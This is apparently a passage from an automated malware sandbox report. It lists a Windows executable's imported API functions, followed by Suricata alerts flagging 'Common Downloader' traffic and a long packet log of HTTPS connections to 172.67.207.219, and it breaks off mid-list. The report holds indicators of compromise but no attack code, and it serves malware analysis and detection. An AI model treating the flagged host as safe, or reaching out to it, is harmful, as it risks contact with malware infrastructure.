KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-26T15:35:12.874627+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49834	443	192.168.11.20	172.67.207.219
2024-08-26T15:36:58.028571+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49844	443	192.168.11.20	172.67.207.219
2024-08-26T15:38:22.106211+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49852	443	192.168.11.20	172.67.207.219
2024-08-26T15:32:24.398809+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49818	443	192.168.11.20	172.67.207.219
2024-08-26T15:34:20.207005+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49829	443	192.168.11.20	172.67.207.219
2024-08-26T15:35:33.923133+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49836	443	192.168.11.20	172.67.207.219
2024-08-26T15:35:44.422795+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49837	443	192.168.11.20	172.67.207.219
2024-08-26T15:39:14.576936+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49857	443	192.168.11.20	172.67.207.219
2024-08-26T15:35:23.403637+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49835	443	192.168.11.20	172.67.207.219
2024-08-26T15:37:08.534612+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49845	443	192.168.11.20	172.67.207.219
2024-08-26T15:38:01.116261+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49850	443	192.168.11.20	172.67.207.219
2024-08-26T15:33:48.667089+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49826	443	192.168.11.20	172.67.207.219
2024-08-26T15:38:32.606941+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49853	443	192.168.11.20	172.67.207.219
2024-08-26T15:33:06.530531+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49822	443	192.168.11.20	172.67.207.219
2024-08-26T15:38:11.609384+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49851	443	192.168.11.20	172.67.207.219
2024-08-26T15:40:17.503268+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49863	443	192.168.11.20	172.67.207.219
2024-08-26T15:33:59.198908+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49827	443	192.168.11.20	172.67.207.219
2024-08-26T15:34:41.251146+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49831	443	192.168.11.20	172.67.207.219
2024-08-26T15:34:51.795578+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49832	443	192.168.11.20	172.67.207.219
2024-08-26T15:39:46.050297+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49860	443	192.168.11.20	172.67.207.219
2024-08-26T15:35:54.951763+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49838	443	192.168.11.20	172.67.207.219
2024-08-26T15:35:02.339615+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49833	443	192.168.11.20	172.67.207.219
2024-08-26T15:32:13.887224+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49817	443	192.168.11.20	172.67.207.219
2024-08-26T15:36:16.007629+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49840	443	192.168.11.20	172.67.207.219
2024-08-26T15:37:40.083784+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49848	443	192.168.11.20	172.67.207.219
2024-08-26T15:37:19.045815+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49846	443	192.168.11.20	172.67.207.219
2024-08-26T15:38:53.610245+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49855	443	192.168.11.20	172.67.207.219
2024-08-26T15:33:27.613907+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49824	443	192.168.11.20	172.67.207.219
2024-08-26T15:33:38.137307+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49825	443	192.168.11.20	172.67.207.219
2024-08-26T15:34:30.714559+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49830	443	192.168.11.20	172.67.207.219
2024-08-26T15:38:43.103485+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49854	443	192.168.11.20	172.67.207.219
2024-08-26T15:39:56.534029+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49861	443	192.168.11.20	172.67.207.219
2024-08-26T15:32:56.006587+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49821	443	192.168.11.20	172.67.207.219
2024-08-26T15:37:50.616639+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49849	443	192.168.11.20	172.67.207.219
2024-08-26T15:32:45.444692+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49820	443	192.168.11.20	172.67.207.219
2024-08-26T15:36:37.019872+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49842	443	192.168.11.20	172.67.207.219
2024-08-26T15:39:35.568493+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49859	443	192.168.11.20	172.67.207.219
2024-08-26T15:39:04.092538+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49856	443	192.168.11.20	172.67.207.219
2024-08-26T15:37:29.555095+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49847	443	192.168.11.20	172.67.207.219
2024-08-26T15:32:34.915709+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49819	443	192.168.11.20	172.67.207.219
2024-08-26T15:40:07.011871+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49862	443	192.168.11.20	172.67.207.219
2024-08-26T15:36:26.512491+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49841	443	192.168.11.20	172.67.207.219
2024-08-26T15:36:47.515652+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49843	443	192.168.11.20	172.67.207.219
2024-08-26T15:39:25.088601+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49858	443	192.168.11.20	172.67.207.219
2024-08-26T15:34:09.694079+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49828	443	192.168.11.20	172.67.207.219
2024-08-26T15:33:17.068405+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49823	443	192.168.11.20	172.67.207.219
2024-08-26T15:36:05.482829+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49839	443	192.168.11.20	172.67.207.219

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 26, 2024 15:32:13.414695978 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.414719105 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.414949894 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.426300049 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.426311970 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.646779060 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.646961927 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.646962881 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.683357954 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.683379889 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.683793068 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.683984995 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.686501026 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.728203058 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.887259960 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.887444019 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.887453079 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.887511015 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.887629986 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.887677908 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.887717009 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.887902021 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.887939930 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.888021946 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:13.888079882 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.888241053 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.889259100 CEST	49817	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:13.889311075 CEST	443	49817	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:23.935919046 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:23.935955048 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:23.936108112 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:23.936286926 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:23.936300993 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.152108908 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.152396917 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.152806044 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.152854919 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.152982950 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.153033018 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.398824930 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.398977041 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.399048090 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.399091959 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.399377108 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.399457932 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.399635077 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.399677992 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.399725914 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:24.399888039 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.399888039 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.700242043 CEST	49818	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:24.700330973 CEST	443	49818	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.449037075 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.449139118 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.449371099 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.449512005 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.449568987 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.668282986 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.668478012 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.668982983 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.669032097 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.669137001 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.669193029 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.915783882 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.916018963 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.916049004 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.916086912 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.916218042 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.916282892 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.916402102 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.916656017 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.916697979 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.916858912 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:34.916888952 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.917049885 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:34.917051077 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:35.229212046 CEST	49819	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:35.229310036 CEST	443	49819	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:44.978113890 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:44.978260994 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:44.978494883 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:44.978653908 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:44.978720903 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.197303057 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.197552919 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.197901964 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.197916985 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.197932959 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.197947025 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.444737911 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.444942951 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.444998026 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.445142984 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.445190907 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.445379019 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.445429087 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.445714951 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.445755005 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.445919037 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.445934057 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.445983887 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.446007013 CEST	443	49820	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:45.446115971 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:45.446185112 CEST	49820	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.538343906 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.538400888 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:55.538669109 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.538777113 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.538813114 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:55.753808022 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:55.754077911 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.754326105 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.754339933 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:55.754682064 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:55.754697084 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.006633043 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.006880045 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:56.006942987 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.006980896 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.007123947 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:56.007220030 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.007510900 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:56.007559061 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.007715940 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:56.007757902 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.007806063 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:56.007863045 CEST	443	49821	172.67.207.219	192.168.11.20
Aug 26, 2024 15:32:56.008017063 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:32:56.008060932 CEST	49821	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.067261934 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.067356110 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.067868948 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.068128109 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.068223953 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.281089067 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.281315088 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.281717062 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.281725883 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.281874895 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.281883955 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.530596018 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.530786991 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.530833006 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.530977011 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531009912 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531147957 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531197071 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531228065 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531315088 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531364918 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531506062 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531666040 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531703949 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531718016 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531739950 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531758070 CEST	443	49822	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:06.531883001 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531883001 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:06.531939983 CEST	49822	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.596678019 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.596772909 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:16.596977949 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.597246885 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.597304106 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:16.817198992 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:16.817446947 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.818062067 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.818075895 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:16.818332911 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:16.818347931 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.068423033 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.068598032 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.068666935 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.068855047 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.068919897 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.069138050 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.069188118 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.069344044 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.069380999 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.069550991 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.069586992 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.069664955 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.069694996 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.069761038 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:17.069803953 CEST	443	49823	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:17.069834948 CEST	49823	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.140887022 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.140986919 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.141181946 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.141427994 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.141490936 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.360585928 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.360882998 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.361272097 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.361272097 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.361287117 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.361295938 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.613930941 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.614128113 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.614200115 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.614378929 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.614439011 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.614495039 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.614681005 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.614746094 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.614936113 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.615000963 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.615181923 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.615200043 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.615257025 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.615300894 CEST	443	49824	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:27.615343094 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:27.615485907 CEST	49824	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:37.669800043 CEST	49825	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:33:37.669922113 CEST	443	49825	172.67.207.219	192.168.11.20
Aug 26, 2024 15:33:37.670130968 CEST	49825	443	192.168.11.20	172.67.207.219
